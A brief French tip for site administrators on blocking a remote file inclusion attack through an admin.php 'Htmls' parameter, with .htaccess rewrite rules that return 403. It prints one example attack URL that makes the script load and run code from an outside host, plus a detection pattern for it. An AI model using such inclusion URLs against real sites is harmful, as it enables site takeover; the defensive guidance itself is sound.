HTACCESS

Empecher le hack via admin.php

Il est possible de prendre le contrôle d'un site disposant d'un script admin.php avec un paramètre Htmls. En effet ce paramètre permet de faire exécuter un script externe.

Pour interdire l'exécution par un hacker de ce script externe il est indispensable d'ajouter une règle dans le fichier .htaccess qui retourne un code retour 403.

Les url essayant de prendre la main sur le site sont sous la forme : http://www.example.com/admin.php?Htmls=http://www.sitepourri.com/page.txt?

RewriteCond %{QUERY_STRING} ^(.*&)?Htmls=http://
RewriteRule ^(.*/)?admin.php$ - [F,L]
PHP